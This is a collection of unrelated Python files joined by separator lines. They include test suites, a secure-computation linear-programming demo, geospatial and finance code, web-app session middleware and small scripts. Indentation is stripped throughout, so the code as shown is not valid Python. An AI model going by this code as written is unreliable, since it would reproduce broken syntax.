"SYSTEM_MODULES",
]
def dedup(iterable: Iterable[str]) -> List:
"""
Return the given iterable sans duplicates.
:param iterable:
"""
return list(OrderedSet(iterable))
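# e.g. dedup(["b", "a", "b", "c"]) -> ["b", "a", "c"] (first-seen order is preserved)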
def is_dunder(attr_name: str) -> bool:
"""
Returns whether the given attr is a magic/dunder method.
:param attr_name:
"""
return attr_name.startswith("__") and attr_name.endswith("__")
def get_signature(
obj: Type,
obj_name: str,
converter: Converter,
) -> Tuple[str, Optional[str]]:
"""
Returns the signature of the given object, as a two element tuple of return type and arguments.
:param obj:
:param obj_name:
:param converter:
"""
return_type: str = "Any"
arguments: Optional[str] = None
doc: Optional[str] = obj.__doc__
if doc in {int.__doc__, str.__doc__}:
doc = None
if doc:
for line in doc.splitlines():
m = re.match(fr"^(.*) {obj_name}\((.*)\)", line.strip())
if m:
csharp_return_type = m.group(1)
return_type = converter.convert_type(csharp_return_type)
arguments = m.group(2)
return return_type, arguments
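# Illustrative example (hypothetical doc line, not taken from a real .NET type):
# for obj_name == "Parse", a doc line "Int32 Parse(String s)" matches the regex
# above, giving arguments == "String s" and return_type == converter.convert_type("Int32").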
def make_property(buf: StringList, name: str) -> None:
"""
Add the signature of a property to the given
:class:`domdf_python_tools.stringlist.StringList`.
:param buf:
:param name:
""" # noqa: D400
with buf.with_indent_size(buf.indent_size + 1):
buf.blankline(ensure_single=True)
buf.append(f"@property\ndef {name}(self): ...")
buf.blankline(ensure_single=True)
with buf.with_indent_size(buf.indent_size + 1):
buf.blankline(ensure_single=True)
buf.append(f"@{name}.setter\ndef {name}(self, value): ...")
buf.blankline(ensure_single=True)
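# For a hypothetical name such as "Length", the appended stub text reads:
#     @property
#     def Length(self): ...
#     @Length.setter
#     def Length(self, value): ...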
def get_child_attrs(obj: Type) -> Iterator[str]:
"""
Returns a list of child attributes for the given object.
:param obj:
"""
child_attrs = dir(obj)
if "__init__" not in child_attrs:
child_attrs.append("__init__")
for child_attr_name in alpha_sort(child_attrs, alphabet=method_alphabet):
if not is_dunder(child_attr_name) or child_attr_name == "__init__":
if child_attr_name not in SKIP_ATTRS:
yield child_attr_name
isort_config = Config(force_single_line=True)
method_alphabet = f"_{string.ascii_uppercase}{string.ascii_lowercase}{ascii_digits}"
SYSTEM_MODULES = [
"System",
"System.Collections",
"System.ComponentModel",
"System.Configuration",
"System.Configuration.Assemblies",
"System.Data",
"System.Globalization",
"System.IO",
"System.Reflection",
"System.Runtime",
"System.Runtime.CompilerServices",
"System.Runtime.InteropServices",
"System.Runtime.Remoting",
"System.Runtime.Serialization",
"System.Security",
"System.Security.AccessControl",
"System.Security.Cryptography",
"System.Security.Cryptography.X509Certificates",
"System.Security.Policy",
"System.Security.Principal",
"System.Threading",
"System.Threading.Tasks",
"System.Xml",
"System.Xml.Schema",
"System.Xml.Serialization",
]
SKIP_ATTRS = {
"None",
"value__",
"AttrsImpl",
"ClassImpl",
"DefaultValueImpl",
"MemberImpl",
"NameImpl",
"PositionImpl",
}
|
##########################################################################
# NSAp - Copyright (C) CEA, 2016
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Mocking Popen directly - need to construct a Mock to return, and adjust its
communicate() return_value.
The benefit of this approach is in not needing to do the strip/split on your
fake return string.
"""
# System import
import unittest
import sys
import os
import copy
# COMPATIBILITY: since python 3.3 mock is included in unittest module
python_version = sys.version_info
if python_version[:2] <= (3, 3):
import mock
from mock import patch
else:
import unittest.mock as mock
from unittest.mock import patch
# pyConnectomist import
from pyconnectomist.tractography.model import dwi_local_modeling
from pyconnectomist.tractography.model import export_scalars_to_nifti
from pyconnectomist.exceptions import ConnectomistBadFileError
from pyconnectomist.exceptions import ConnectomistError
class ConnectomistDWIModel(unittest.TestCase):
""" Test the Connectomist 'Local modeling' tab:
'pyconnectomist.tractography.model.dwi_local_modeling'
"""
def setUp(self):
""" Run before each test - the mock_popen will be available and in the
right state in every test<something> function.
"""
# Mocking popen
self.popen_patcher = patch("pyconnectomist.wrappers.subprocess.Popen")
self.mock_popen = self.popen_patcher.start()
mock_process = mock.Mock()
attrs = {
"communicate.return_value": ("mock_OK", "mock_NONE"),
"returncode": 0
}
mock_process.configure_mock(**attrs)
self.mock_popen.return_value = mock_process
self.kwargs = {
"outdir": "/my/path/mock_outdir",
"registered_dwi_dir": "/my/path/mock_regitereddwidir",
"eddy_motion_dir": "/my/path/mock_eddydir",
"rough_mask_dir": "/my/path/mock_maskdir",
"subject_id": "Lola",
"model": "aqbi",
"order": 4,
"aqbi_laplacebeltrami_sharpefactor": 0.0,
"regularization_lccurvefactor": 0.006,
"dti_estimator": "linear",
"constrained_sd": False,
"sd_kernel_type": "symmetric_tensor",
"sd_kernel_lower_fa": 0.65,
"sd_kernel_upper_fa": 0.85,
"sd_kernel_voxel_count": 300,
"rgbscale": 1.0,
"path_connectomist": "/my/path/mock_connectomist"
}
def tearDown(self):
""" Run after each test.
"""
self.popen_patcher.stop()
@mock.patch("os.path")
def test_badfileerror_raise(self, mock_path):
""" A bad input file -> raise ConnectomistBadFileError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [False, True, True, True, True]
# Test execution
self.assertRaises(ConnectomistBadFileError, dwi_local_modeling,
**self.kwargs)
@mock.patch("os.path")
def test_modelerror_raise(self, mock_path):
""" A bad model -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["model"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_estimatorerror_raise(self, mock_path):
""" A bad estimator -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["dti_estimator"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_constrainedsderror_raise(self, mock_path):
""" A bad constrained_sd value -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["constrained_sd"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("os.path")
def test_kernelerror_raise(self, mock_path):
""" A bad kernel -> raise ConnectomistError.
"""
# Set the mocked functions returned values
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
wrong_kwargs = copy.copy(self.kwargs)
wrong_kwargs["sd_kernel_type"] = "WRONG"
self.assertRaises(ConnectomistError, dwi_local_modeling,
**wrong_kwargs)
@mock.patch("pyconnectomist.tractography.model.ConnectomistWrapper."
"_connectomist_version_check")
@mock.patch("pyconnectomist.tractography.model.ConnectomistWrapper."
"create_parameter_file")
@mock.patch("os.path")
def test_normal_execution(self, mock_path, mock_params, mock_version):
""" Test the normal behaviour of the function.
"""
# Set the mocked functions returned values
mock_params.return_value = "/my/path/mock_parameters"
mock_path.join.side_effect = lambda *x: x[0] + "/" + x[1]
mock_path.isfile.side_effect = [True, True, True, True, True]
# Test execution
outdir = dwi_local_modeling(**self.kwargs)
self.assertEqual(outdir, self.kwargs["outdir"])
self.assertEqual(len(mock_params.call_args_list), 1)
self.assertEqual(len(self.mock_popen.call_args_list), 2)
self.assertEqual([
mock.call(self.kwargs["eddy_motion_dir"],
"dw_wo_eddy_current_and_motion.ima"),
mock.call(self.kwargs["rough_mask_dir"], "mask.ima"),
mock.call(self.kwargs["registered_dwi_dir"], "t1.ima"),
mock.call(self.kwargs["eddy_motion_dir"],
"t2_wo_eddy_current_and_motion.ima"),
mock.call(self.kwargs["registered_dwi_dir"], "dw_to_t1.trm")],
mock_path.join.call_args_list)
self.assertEqual([
mock.call(os.path.join(self.kwargs["eddy_motion_dir"],
"dw_wo_eddy_current_and_motion.ima")),
mock.call(os.path.join(self.kwargs["rough_mask_dir"],
"mask.ima")),
mock.call(os.path.join(self.kwargs["registered_dwi_dir"],
"t1.ima")),
mock.call(os.path.join(self.kwargs["eddy_motion_dir"],
"t2_wo_eddy_current_and_motion.ima")),
mock.call(os.path.join(self.kwargs["registered_dwi_dir"],
"dw_to_t1.trm"))],
mock_path.isfile.call_args_list)
class ConnectomistModelExport(unittest.TestCase):
""" Test the Connectomist 'Local modeling' tab Nifti export:
'pyconnectomist.tractography.model.export_scalars_to_nifti'
"""
def setUp(self):
""" Define Function parameters.
"""
self.kwargs = {
"model_dir": "/my/path/mock_modeldir",
"model": "qba",
"outdir": "/my/path/mock_outdir"
}
@mock.patch("pyconnectomist.tractography.model.ptk_gis_to_nifti")
@mock.patch("pyconnectomist.tractography.model.os.path.isdir")
@mock.patch("pyconnectomist.tractography.model.os.path.isfile")
@mock.patch("pyconnectomist.tractography.model.os.mkdir")
def test_normal_execution(self, mock_mkdir, mock_isfile, mock_isdir,
mock_conversion):
""" Test the normal behaviour of the function.
"""
# Set the mocked functions returned values
mock_isfile.side_effect = [True, True, False, False, False, False,
False]
mock_isdir.side_effect = [False]
mock_conversion.side_effect = lambda *x: x[-1]
# Test execution
outfiles = export_scalars_to_nifti(**self.kwargs)
expected_outfiles = {
"gfa": os.path.join(
self.kwargs["outdir"],
"{0}_gfa.nii.gz".format(self.kwargs["model"])),
"mean_diffusivity": os.path.join(
self.kwargs["outdir"],
"{0}_mean_diffusivity.nii.gz".format(self.kwargs["model"]))}
expected_files = []
for name in ("gfa", "mean_diffusivity", "adc", "lambda_parallel",
"lambda_transverse", "fa"):
expected_files.append(
os.path.join(
self.kwargs["model_dir"],
"{0}_{1}.ima".format(self.kwargs["model"], name)))
self.assertEqual(expected_outfiles, outfiles)
self.assertEqual([mock.call(self.kwargs["outdir"])],
mock_isdir.call_args_list)
self.assertEqual([mock.call(self.kwargs["outdir"])],
mock_mkdir.call_args_list)
self.assertEqual([mock.call(elem) for elem in expected_files],
mock_isfile.call_args_list)
self.assertEqual([
mock.call(expected_files[0], expected_outfiles["gfa"]),
mock.call(expected_files[1],
expected_outfiles["mean_diffusivity"])],
mock_conversion.call_args_list)
if __name__ == "__main__":
unittest.main()
|
import sys
def opposite(number):
return number * (-1)
if __name__ == "__main__":
if len(sys.argv) == 2:
print(opposite(number=int(sys.argv[1])))
else:
sys.exit(1)
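# Usage sketch: "python <this_script>.py 5" prints -5; any other argument count exits with status 1.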
|
from setuptools import setup, find_packages
setup(
name='jsonpkt',
packages=find_packages(),
version='0.0.1',
author='Keito Osaki',
author_email='o.keito317@icloud.com',
)
|
import pytest
from xclingo.preprocessor._utils import translate_show_all, translate_trace_all, translate_trace
class TestUtils:
def test_translate_trace_all(self, datadir):
input_text = (datadir / 'test_trace_all_input').read_text()
expected_text = (datadir / 'test_trace_all_output').read_text()
translated = translate_trace_all(input_text)
assert expected_text == translated
def test_translate_show_all(self, datadir):
input_text = (datadir / 'test_show_all_input').read_text()
expected_text = (datadir / 'test_show_all_output').read_text()
translated = translate_show_all(input_text)
assert expected_text == translated
def test_translate_trace(self, datadir):
input_text = (datadir / 'test_trace_input').read_text()
expected_text = (datadir / 'test_trace_output').read_text()
translated = translate_trace(input_text)
print(translated)
print('--------')
print(expected_text)
assert expected_text == translated
|
# -*- coding: utf-8 -*-
"""
Created on Mon Sep 28 08:12:43 2020
@author: cis-user
"""
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# a=max(s)
# print(a)
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# a=min(s)
# print(a)
# score=['wang',5,9,6,8,7,10,6]
# s=score[1:]
# y= sorted(s,reverse=True)
# a,b,c,d,e,f,g=y
# print(y[0:3])
# score=['wang',5,9,6,8,7,10,6]
# s=score[1:]
# y= sorted(s,reverse=True)
# a,b,c,d,e,f,g=y
# print(y[4:7])
# score=['小徐',5,9,6,8,7,10,6]
# s=score[1:]
# x=sum(s)/len(s)
# print(x)
# for i in range(1,10):
# for j in range(1,10):
# print('{}x{}={}\t'.format(j,i,f'{i*j:>2}'),end='')
# print()
# string='I LOVE YOU'
# import random as i
# a=i.randint(1,100)
# for b in range(a):
# c=' so'*b+' much'
# print(string,c)
|
"""Demo Linear Programming (LP) solver.
The LP solver returns a solution to the following problem.
Given m x n matrix A, length-m vector b >=0, and length-n vector c.
Find a length-n vector x maximizing c.x subject to A x <= b and x >= 0.
The small (or, condensed) tableau variant of the Simplex algorithm is used.
The entries of A, b, and c are all assumed to be integral. Since b >= 0,
the all-zero vector x=0 is a feasible solution. It is also assumed that
a solution exists (hence that the problem is not unbounded).
The solution x is in general not integral. As a certificate of optimality,
a solution y to the dual problem is computed as well, that is, y is a
length-m vector minimizing b.y subject to y A >= c and y >= 0. The solutions
are represented by integer vectors, and one additional number, which is the
common denominator of all entries of the solution vectors.
"""
import os
import logging
import argparse
from mpyc.runtime import mpc
def load_tableau(filename):
T = []
comment_sign = '#'
sep = ','
with open(os.path.join('data', 'lp', filename + '.csv'), 'r') as f:
for line in f:
# strip comments and whitespace and skip empty lines
line = line.split(comment_sign)[0].strip()
if line:
T.append(list(map(int, line.split(sep))))
T[-1].append(0)
return T
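# Illustrative tableau file (an assumed example; the demo reads its own data/lp/*.csv):
# each of the first m lines holds one constraint row of A followed by the matching
# entry of b, and the final line holds the objective coefficients c (the trailing 0
# is appended by load_tableau itself), e.g.
#   2, 1, 10
#   1, 3, 15
#   3, 2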
def pow_list(a, x, n):
if n == 1:
return [a]
even = pow_list(a, x**2, (n+1)//2)
if n%2 == 1:
d = even.pop()
odd = mpc.scalar_mul(x, even)
xs = [None] * n
for i in range(n//2):
xs[2*i] = even[i]
xs[2*i+1] = odd[i]
if n%2 == 1:
xs[-1] = d
return xs
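# pow_list(a, x, n) returns [a, a*x, a*x**2, ..., a*x**(n-1)]; recursing on x**2
# keeps the multiplicative depth logarithmic in n.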
def argmin(x, arg_le):
n = len(x)
if n == 1:
return ([1], x[0])
if n == 2:
b, m = arg_le(x[0], x[1])
return ([1 - b, b], m)
b2 = [None] * (n//2)
m2 = [None] * ((n+1)//2)
for i in range(n//2):
b2[i], m2[i] = arg_le(x[2*i], x[2*i+1])
if n%2 == 1:
m2[-1] = x[-1]
a2, m = argmin(m2, arg_le)
a = [None] * n
if n%2 == 1:
a[-1] = a2.pop()
b2 = mpc.schur_prod(b2, a2)
for i in range(n//2):
a[2*i] = a2[i] - b2[i]
a[2*i+1] = b2[i]
return a, m
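# argmin(x, arg_le) returns (a, m): a is a 0/1 indicator vector selecting one
# minimizing entry of x (computed obliviously), and m is that minimum value.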
def argmin_int(xs):
def arg_le_int(x0, x1):
a = x0 >= x1
m = x0 + a * (x1 - x0)
return a, m
return argmin(xs, arg_le_int)
def argmin_rat(xs):
def arg_le_rat(x0, x1):
(n0, d0) = x0
(n1, d1) = x1
a = mpc.in_prod([n0, d0], [d1, -n1]) >= 0
h = mpc.scalar_mul(a, [n1 - n0, d1 - d0])
m = (h[0] + n0, h[1] + d0)
return a, m
return argmin(xs, arg_le_rat)
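# arg_le_rat compares the fractions n0/d0 and n1/d1 via the sign of n0*d1 - n1*d0
# (valid for positive denominators), so no secure division is needed.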
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-d', '--data', help='Filename for tableau.')
parser.add_argument('options', nargs='*')
parser.set_defaults(data='default')
args = parser.parse_args(mpc.args)
if not args.options:
certificate_filename = 'c' + str(mpc.id) + '.cert'
logging.info('Setting certificate file to default = %s', certificate_filename)
else:
certificate_filename = args.options[0]
T = load_tableau(args.data)
l = mpc.options.bit_length
m = len(T) - 1
n = len(T[0]) - 1
secint = mpc.SecInt(l, m + n)
for i in range(len(T)):
for j in range(len(T[0])):
T[i][j] = secint(T[i][j])
Zp = secint.field
p = Zp.modulus
N = Zp.nth
w = Zp.root
w_powers = [Zp(1)]
for _ in range(N - 1):
w_powers.append(w_powers[-1] * w)
assert w_powers[-1] * w == 1
basis = [secint(w_powers[-(i+n)]) for i in range(m)]
cobasis = [secint(w_powers[-j]) for j in range(n)]
prev_pivot = secint(1)
mpc.start()
iteration = 0
logging.info('%d Termination?...', iteration)
p_col_index, minimum = argmin_int(T[-1][:-1])
while mpc.run(mpc.output(minimum < 0)):
iteration += 1
logging.info('%d Determining pivot...', iteration)
p_col = mpc.matrix_prod([p_col_index], T, True)[0]
constraints = [(T[i][-1] + (p_col[i] <= 0), p_col[i]) for i in range(m)]
p_row_index, (_, pivot) = argmin_rat(constraints)
logging.info('%d Updating tableau...', iteration)
# T[i,j] = T[i,j]*p/p' - (C[i]/p' - p_row_index[i])*(R[j] + p * p_col_index[j])
p_row = mpc.matrix_prod([p_row_index], T)[0]
delta_row = mpc.scalar_mul(prev_pivot, p_col_index)
delta_row.append(secint(0))
p_row = mpc.vector_add(p_row, delta_row)
prev_p_inv = 1 / prev_pivot
p_col = mpc.scalar_mul(prev_p_inv, p_col)
p_col = mpc.vector_sub(p_col, p_row_index + [secint(0)])
T = mpc.gauss(T, pivot * prev_p_inv, p_col, p_row)
prev_pivot = pivot
# swap basis entries
delta = mpc.in_prod(basis, p_row_index) - mpc.in_prod(cobasis, p_col_index)
p_row_index = mpc.scalar_mul(delta, p_row_index)
basis = mpc.vector_sub(basis, p_row_index)
p_col_index = mpc.scalar_mul(delta, p_col_index)
cobasis = mpc.vector_add(cobasis, p_col_index)
logging.info('%d Termination?...', iteration)
p_col_index, minimum = argmin_int(T[-1][:-1])
mpc.run(mpc.barrier())
logging.info('Termination...')
mx = mpc.run(mpc.output(T[-1][-1]))
cd = mpc.run(mpc.output(prev_pivot))
print(' max(f) = %d / %d = %f' % (mx.value, cd.value, float(mx.value)/cd.value))
logging.info('Computing solution...')
sum_x_powers = [secint(0) for _ in range(N)]
for i in range(m):
x_powers = pow_list(T[i][-1] / N, basis[i], N)
sum_x_powers = mpc.vector_add(sum_x_powers, x_powers)
solution = [None] * n
for j in range(n):
coefs = [w_powers[(j*k)%N] for k in range(N)]
solution[j] = mpc.lin_comb(coefs, sum_x_powers)
solution = mpc.run(mpc.output(solution))
logging.info('Computing dual solution...')
sum_x_powers = [secint(0) for _ in range(N)]
for j in range(n):
x_powers = pow_list(T[-1][j] / N, cobasis[j], N)
sum_x_powers = mpc.vector_add(sum_x_powers, x_powers)
dual_solution = [None] * m
for i in range(m):
coefs = [w_powers[((n+i)*k)%N] for k in range(N)]
dual_solution[i] = mpc.lin_comb(coefs, sum_x_powers)
dual_solution = mpc.run(mpc.output(dual_solution))
mpc.shutdown()
logging.info('Writing output to %s.', certificate_filename)
with open(os.path.join('data', 'lp', certificate_filename), 'w') as f:
f.write('# tableau = \n' + args.data + '\n')
f.write('# modulus = \n' + str(p) + '\n')
f.write('# bit-length = \n' + str(mpc.options.bit_length) + '\n')
f.write('# security parameter = \n' + str(mpc.options.security_parameter) + '\n')
f.write('# threshold = \n' + str(mpc.threshold) + '\n')
f.write('# common denominator = \n' + str(cd.value) + '\n')
f.write('# solution = \n')
f.write('\t'.join(str(x.value) for x in solution) + '\n')
f.write('# dual solution = \n')
f.write('\t'.join(str(x.value) for x in dual_solution) + '\n')
if __name__ == '__main__':
main()
|
import logging
import numpy
import sys
import rasterio
from rasterio.features import rasterize
from rasterio.transform import IDENTITY
logging.basicConfig(stream=sys.stderr, level=logging.INFO)
logger = logging.getLogger('rasterize_geometry')
rows = cols = 10
geometry = {'type':'Polygon','coordinates':[[(2,2),(2,4.25),(4.25,4.25),(4.25,2),(2,2)]]}
with rasterio.drivers():
result = rasterize([geometry], out_shape=(rows, cols))
with rasterio.open(
"test.tif",
'w',
driver='GTiff',
width=cols,
height=rows,
count=1,
dtype=numpy.uint8,
nodata=0,
transform=IDENTITY,
crs={'init': "EPSG:4326"}) as out:
out.write_band(1, result.astype(numpy.uint8))
|
#!/usr/bin/env python
#
# Set up a virtualenv environment with the prerequisites for csrv.
# To use this, install virtualenv, run this script, and then run the generated
# csrv-bootstrap.py to create an environment with the needed dependencies.
#
import virtualenv
script = virtualenv.create_bootstrap_script('''
import os
import subprocess
def after_install(options, home_dir):
etc = os.path.join(home_dir, 'etc')
if not os.path.exists(etc):
os.makedirs(etc)
subprocess.call([
join(home_dir, 'bin', 'pip'), 'install', 'tornado',
])
''')
with open('csrv-bootstrap.py', 'w') as script_file:
script_file.write(script)
|
# Copyright 2016-present CERN – European Organization for Nuclear Research
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from enum import Enum
from typing import Mapping, Sequence
from qf_lib.common.enums.frequency import Frequency
from qf_lib.common.enums.price_field import PriceField
from qf_lib.common.tickers.tickers import BloombergTicker
from qf_lib.common.utils.dateutils.common_start_and_end import get_common_start_and_end
from qf_lib.containers.dataframe.cast_dataframe import cast_dataframe
from qf_lib.containers.dataframe.prices_dataframe import PricesDataFrame
from qf_lib.containers.dataframe.simple_returns_dataframe import SimpleReturnsDataFrame
from qf_lib.containers.series.simple_returns_series import SimpleReturnsSeries
from qf_lib.data_providers.bloomberg.bloomberg_data_provider import BloombergDataProvider
from qf_lib.portfolio_construction.portfolio_models.equal_risk_contribution_portfolio import \
EqualRiskContributionPortfolio
from qf_lib.portfolio_construction.portfolio_models.portfolio import Portfolio
class ChangeDirection(Enum):
RISING = 1
"""Rising"""
FALLING = 2
"""Failing"""
class RiskParityBoxes(object):
def __init__(self, boxes_dict: Mapping[ChangeDirection, Mapping[ChangeDirection, SimpleReturnsSeries]]):
self._boxes_dict = boxes_dict
def get_series(self, growth: ChangeDirection, inflation: ChangeDirection) -> SimpleReturnsSeries:
return self._boxes_dict[growth][inflation]
def as_list(self) -> Sequence[SimpleReturnsSeries]:
"""
Creates a list of series corresponding to risk parity boxes. Order of series:
(growth=RISING, inflation=RISING), (growth=RISING, inflation=FALLING), (growth=FALLING, inflation=RISING),
(growth=FALLING, inflation=FALLING).
"""
list_of_series = []
for growth in ChangeDirection:
for inflation in ChangeDirection:
series = self._boxes_dict[growth][inflation]
list_of_series.append(series)
return list_of_series
@staticmethod
def from_list(list_of_series: Sequence[SimpleReturnsSeries]) -> "RiskParityBoxes":
"""
Create a RiskParityBoxes instance from a list of series. The order in the list must be the following:
(growth=RISING, inflation=RISING), (growth=RISING, inflation=FALLING), (growth=FALLING, inflation=RISING),
(growth=FALLING, inflation=FALLING).
"""
series_iter = iter(list_of_series)
growth_to_inflation_to_series = dict()
for growth in ChangeDirection:
inflation_to_series = dict()
for inflation in ChangeDirection:
series = next(series_iter)
inflation_to_series[inflation] = series
growth_to_inflation_to_series[growth] = inflation_to_series
try:
next(series_iter)
raise ValueError("Got more series than expected: {:d}".format(len(list_of_series)))
except StopIteration:
pass # this error was expected
return RiskParityBoxes(growth_to_inflation_to_series)
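# Note: as_list() and from_list() iterate ChangeDirection in the same fixed order,
# so RiskParityBoxes.from_list(boxes.as_list()) rebuilds an equivalent box mapping.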
class RiskParityBoxesFactory(object):
"""
Makes timeseries for risk parity boxes.
Parameters
----------
bbg_data_provider: BloombergDataProvider
reference to bloomberg data provider
"""
def __init__(self, bbg_data_provider: BloombergDataProvider):
self.bbg_data_provider = bbg_data_provider
# index: growth, columns: inflation
self.tickers_dict = self._create_tickers_dict()
self.all_tickers = self._get_all_tickers(self.tickers_dict)
def make_parity_boxes(self, start_date: datetime, end_date: datetime, frequency: Frequency = Frequency.DAILY) -> RiskParityBoxes:
"""
Downloads the needed data and makes parity boxes. Each box is one series of returns (starting at the first
date after start_date and ending at the end_date).
"""
asset_rets_df = self._get_assets_data(end_date, start_date, frequency)
# create a dict: growth -> inflation -> None
boxes_df = dict()
for growth in ChangeDirection:
inflation_to_rets_dict = dict()
for inflation in ChangeDirection:
tickers = self.tickers_dict[growth][inflation]
asset_rets_for_box_df = asset_rets_df.loc[:, tickers]
boxes_rets = self._calculate_box(asset_rets_for_box_df)
inflation_to_rets_dict[inflation] = boxes_rets
boxes_df[growth] = inflation_to_rets_dict
return RiskParityBoxes(boxes_df)
@staticmethod
def _create_tickers_dict():
# growth -> inflation -> tickers
tickers_dict = {
ChangeDirection.RISING: {
ChangeDirection.RISING: [
BloombergTicker("SPGSCITR Index"), # Commodities (S&P GSCI Total Return CME)
BloombergTicker("MSBIERTR Index"), # EM Debt (Morningstar Emerging Markets Corporate Bond Index TR)
BloombergTicker("XAU Curncy") # Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
],
ChangeDirection.FALLING: [
BloombergTicker("MXUS Index"), # Equity USA (MSCI USA)
BloombergTicker("LQD US Equity") # Credit (ISHARES IBOXX investment grade corporate bond etf)
]
},
ChangeDirection.FALLING: {
ChangeDirection.RISING: [
# ILB (Bloomberg Barclays US Inflation Linked Bonds 1 to 10 Year TR)
BloombergTicker("BCIT3T Index"),
# Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
BloombergTicker("XAU Curncy")
],
ChangeDirection.FALLING: [
BloombergTicker("IEF US Equity"), # Gov bonds (7-10y treasury)
BloombergTicker("XAU Curncy") # Gold (XAUUSD Spot Exchange Rate - Price of 1 XAU in USD)
]
}
}
return tickers_dict
@staticmethod
def _get_all_tickers(tickers_dict):
all_tickers = set()
for inflation_to_tickers in tickers_dict.values():
for tickers in inflation_to_tickers.values():
all_tickers.update(tickers)
return sorted(list(all_tickers))
def _get_assets_data(self, end_date, start_date, frequency):
# download data
asset_prices_df = self.bbg_data_provider.get_price(self.all_tickers, PriceField.Close, start_date, end_date, frequency)
asset_prices_df = cast_dataframe(asset_prices_df, output_type=PricesDataFrame)
# trim
common_start, common_end = get_common_start_and_end(asset_prices_df)
trimmed_asset_prices_df = asset_prices_df.loc[common_start:common_end, :] # type: PricesDataFrame
# remove intermediate NaNs
trimmed_asset_prices_df = trimmed_asset_prices_df.fillna(method='pad') # forward fill
# convert to simple returns
assets_rets = trimmed_asset_prices_df.to_simple_returns()
return assets_rets
@staticmethod
def _calculate_box(asset_returns_df: SimpleReturnsDataFrame) -> SimpleReturnsSeries:
portfolio = EqualRiskContributionPortfolio(asset_returns_df.cov())
weights = portfolio.get_weights()
portfolio_rets, _ = Portfolio.constant_weights(asset_returns_df, weights)
return portfolio_rets
|
import os
from pathlib import Path
from watchdog.events import FileSystemEvent, PatternMatchingEventHandler
from watchdog.observers import Observer
from mitama._extra import _Singleton
from mitama.app.http import Response
from mitama.app.app import _session_middleware
from .method import group
from .router import Router
class AppRegistry(_Singleton):
"""稼働しているアプリのレジストリ
サーバー内で稼働しているアプリのパスやパッケージ名が登録されているレジストリです。
mitama.jsonを読み込んでアプリを起動するクラスでもあります。
dictっぽくアプリの取得や配信の停止などが可能です。
"""
_map = dict()
_server = None
_router = None
def __init__(self):
super().__init__()
def __iter__(self):
for app in self._map.values():
yield app
def __setitem__(self, app_name, app):
app.project = self.project
self._map[app_name] = app
def sorter(x):
x_ = x[1].path
if x_[-1] != "/":
x_ += "/"
return -1 * len(x_.split('/'))
self._map = dict(
sorted(
self._map.items(),
key=sorter
)
)
def __getitem__(self, app_name):
return self._map[app_name]
def __delitem__(self, app_name):
del self._map[app_name]
def reset(self):
"""アプリの一覧をリセットします"""
self._map = dict()
def router(self):
"""アプリの情報に基づいてルーティングエンジンを生成します"""
from mitama.app.method import view
from mitama.utils.controllers import static_files
if self._router is None:
app_mod_dir = Path(os.path.dirname(__file__))
router = Router(
[
view("/_mitama/<path:path>", static_files(app_mod_dir / "static"))
],
middlewares=[_session_middleware()]
)
for app in self:
router.add_route(group(app.path, app))
self._router = router
return self._router
def _session_middleware():
import base64
from Crypto.Random import get_random_bytes
from mitama.app import Middleware
from mitama.app.http.session import EncryptedCookieStorage
if "MITAMA_SESSION_KEY" in os.environ:
session_key = os.environ["MITAMA_SESSION_KEY"]
elif os.path.exists(".tmp/MITAMA_SESSION_KEY"):
with open(".tmp/MITAMA_SESSION_KEY", "r") as f:
session_key = f.read()
else:
key = get_random_bytes(16)
session_key = base64.urlsafe_b64encode(key).decode("utf-8")
if not os.path.exists(".tmp"):
os.mkdir(".tmp")
with open(".tmp/MITAMA_SESSION_KEY", "w") as f:
f.write(session_key)
class SessionMiddleware(Middleware):
fernet_key = session_key
def __init__(self, app = None):
self.app = app
secret_key = base64.urlsafe_b64decode(
self.fernet_key.encode("utf-8")
)
cookie_storage = EncryptedCookieStorage(secret_key)
self.storage = cookie_storage
def process(self, request, handler):
request["mitama_session_storage"] = self.storage
raise_response = False
response = handler(request)
if not isinstance(response, Response):
return response
session = request.get("mitama_session")
if session is not None:
if session._changed:
self.storage.save_session(request, response, session)
if raise_response:
raise response
return response
return SessionMiddleware
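# Session-key resolution above: the MITAMA_SESSION_KEY environment variable wins,
# then the cached .tmp/MITAMA_SESSION_KEY file; otherwise a fresh random key is
# generated and written to .tmp/MITAMA_SESSION_KEY for later runs.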
|
# -*- coding: utf-8 -*-
"""
Profile: http://hl7.org/fhir/StructureDefinition/Immunization
Release: STU3
Version: 3.0.2
Revision: 11917
Last updated: 2019-10-24T11:53:00+11:00
"""
from pydantic.validators import bytes_validator # noqa: F401
from .. import fhirtypes # noqa: F401
from .. import immunization
def impl_immunization_1(inst):
assert inst.date == fhirtypes.DateTime.validate("2013-01-10")
assert inst.doseQuantity.code == "mg"
assert inst.doseQuantity.system == "http://unitsofmeasure.org"
assert float(inst.doseQuantity.value) == float(5)
